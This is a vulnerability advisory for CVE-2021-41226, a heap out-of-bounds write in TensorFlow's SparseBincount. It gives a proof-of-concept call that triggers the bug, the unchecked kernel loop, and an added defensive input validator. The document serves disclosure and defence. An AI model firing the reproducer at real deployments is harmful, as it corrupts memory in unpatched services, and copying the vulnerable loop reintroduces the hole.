CVE-2021-41226: Heap OOB in `SparseBinCount`
The implementation of `SparseBincount` (reachable from Python as `tf.raw_ops.SparseBincount`) is vulnerable to a heap out-of-bounds (OOB) access. The following call triggers it:
```python
import tensorflow as tf

tf.raw_ops.SparseBincount(
    indices=[[0], [1], [2]],   # three rows ...
    values=[0, -10000000],     # ... but only two values, one of them negative
    dense_shape=[1, 1],
    size=[1],
    weights=[3, 2, 1],
    binary_output=False)
```
This is because of missing validation between the elements of the `values` argument and the shape of the sparse output. In the kernel loop below, each `values(i)` is used directly as the column index `bin` of the output and each `indices(i, 0)` as the row index `batch`, with no check that either lies inside the output's dimensions, and no check that `values` has as many elements as `indices` has rows (the loop runs over the rows of `indices`, so a shorter `values` is read past its end). A negative element such as `-10000000` therefore becomes a write far before the start of the output buffer:
```cpp
// Vulnerable loop (pre-fix): neither `batch` nor `bin` is bounds-checked.
for (int64_t i = 0; i < indices_mat.dimension(0); ++i) {
  const int64_t batch = indices_mat(i, 0);   // row index, taken from `indices`
  const Tidx bin = values(i);                // column index, taken from `values`
  ...
  out(batch, bin) = ...;                     // unchecked write into `out`
}
```
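The checks the loop above omits, written out as a pre-flight validator that a service can run on untrusted inputs before calling `tf.raw_ops.SparseBincount`. This is an added example and not TensorFlow code; it assumes the output is a row-major `(dense_shape[0], size[0])` buffer indexed as `out(batch, bin)`, as the kernel snippet shows, and it needs no TensorFlow install. The PoC arguments are constructed inline to show what it rejects.

```python
"""Pre-flight validation for SparseBincount-style inputs (added example).

Mirrors the bounds the vulnerable kernel loop never enforced:

    out(batch, bin) = ...   # batch = indices[i][0], bin = values[i]

where `out` is assumed to have shape (dense_shape[0], size[0]).
"""
from typing import List, Sequence


def validate_sparse_bincount(indices: Sequence[Sequence[int]],
                             values: Sequence[int],
                             dense_shape: Sequence[int],
                             size: Sequence[int],
                             weights: Sequence[float] = ()) -> List[str]:
    """Return a list of problems; an empty list means every index the kernel
    loop would touch lies inside the buffers it reads or writes."""
    problems: List[str] = []

    # The output is (dense_shape[0] x size[0]); both must be usable as dims.
    if len(size) != 1 or size[0] < 0:
        problems.append(f"size must be a single non-negative value, got {list(size)}")
    if len(dense_shape) < 1 or any(d < 0 for d in dense_shape):
        problems.append(f"dense_shape must have >= 1 non-negative dims, got {list(dense_shape)}")
    if problems:
        return problems  # cannot reason about indices without a valid shape

    n_rows = len(indices)
    n_batches = dense_shape[0]
    n_bins = size[0]

    # The loop reads values(i) and weights(i) for every row of indices, so a
    # shorter `values` or `weights` is an out-of-bounds read. Empty weights
    # are allowed here as "no weights" (assumption of this example).
    if len(values) != n_rows:
        problems.append(f"values has {len(values)} elements but indices has {n_rows} rows")
    if len(weights) not in (0, n_rows):
        problems.append(f"weights has {len(weights)} elements but indices has {n_rows} rows")

    # Each (batch, bin) pair is used directly as an output index.
    for i, row in enumerate(indices):
        if len(row) < 1:
            problems.append(f"indices[{i}] is empty")
            continue
        batch = row[0]
        if not 0 <= batch < n_batches:
            problems.append(f"indices[{i}][0] = {batch} is outside [0, {n_batches})")
        if i < len(values):
            bin_ = values[i]
            if not 0 <= bin_ < n_bins:
                problems.append(f"values[{i}] = {bin_} is outside [0, {n_bins})")
    return problems


def row_major_offset(batch: int, bin_: int, n_bins: int) -> int:
    """Element offset that out(batch, bin) resolves to in a row-major buffer
    with n_bins columns; anything negative or >= rows*n_bins is a wild write."""
    return batch * n_bins + bin_


# Constructed PoC arguments: the same values as the advisory's reproducer.
POC = dict(indices=[[0], [1], [2]], values=[0, -10000000],
           dense_shape=[1, 1], size=[1], weights=[3, 2, 1])

if __name__ == "__main__":
    for p in validate_sparse_bincount(**POC):
        print("reject:", p)
    # Where the second iteration's write would land relative to out's start.
    print("offset of out(1, -10000000):", row_major_offset(1, -10000000, 1))
```

Against the PoC the validator reports four problems: the `values`/`indices` length mismatch, two `batch` rows outside `[0, 1)`, and the negative `bin`; the second iteration's write would land 9,999,999 elements before the start of the output buffer, which is what makes this a heap OOB rather than an off-by-one.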
References
- github.com/advisories/GHSA-374m-jm66-3vj8
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-cpu/PYSEC-2021-635.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-gpu/PYSEC-2021-833.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow/PYSEC-2021-418.yaml
- github.com/tensorflow/tensorflow
- github.com/tensorflow/tensorflow/commit/f410212e373eb2aec4c9e60bf3702eba99a38aba
- github.com/tensorflow/tensorflow/security/advisories/GHSA-374m-jm66-3vj8
- nvd.nist.gov/vuln/detail/CVE-2021-41226